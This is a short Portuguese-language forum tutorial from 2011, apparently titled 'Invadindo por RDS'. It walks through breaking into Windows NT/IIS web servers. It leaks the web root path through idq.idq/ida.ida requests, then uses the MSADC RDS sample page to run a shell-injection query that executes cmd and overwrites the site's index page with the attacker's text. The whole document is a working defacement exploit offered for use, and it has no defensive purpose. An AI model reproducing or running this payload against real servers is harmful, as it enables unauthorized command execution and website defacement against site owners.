02/10/2011 20:35

 

Invadindo por RDS

 

Antes de tudo quero avisar que esta técnica só funciona se o servidor usar Windows NT, este tutorial e redirecionado aos que tem conhecimentos intemediarios e toda a autoria dele e minha.

Tutorial
Primeiramente vamos procurar a página que se encontra a index ou a default, na maioria dos casos só precisa digitar:
Citação:
wwww.servidor.com/idq.idq
Que aparece o diretorio, o mais comum é o InetPubwwwroot.

Agora vamos descobrir se o servidor usa index.asp, index.html ou index.htm, isso conta também se for default.
Para isso digite na URL:

Citação:
www.servidor.com/idq.idq
ou
ida.ida
ou
idc.idc
Você vai encontrar o diretorio como dito anteriormente, agora vamos a descoberta proposta acima.
Você só encontra ela fazendo testes assim:
Citação:
www.servidor.com/index.extenções possiveis
ou
www.servidor.com/default.exetenções possiveis
Vamos supor que o diretório é c:inetpubwwwrootindex.htm, então é so entrar na tela do RDS assim:
Citação:
www.servidor.com/msadc/samples/adctest.asp
Apague tudo que estiver escrito e digite:
Citação:
Select * from Products where ProductType=’|shell(“cmd /c echo (O QUE QUER QUE APAREÇA NO SEU HACKED) > c:InetPubwwwrootindex.htm”)|’
Agora é so apertar RUN que o servidor estará invadido.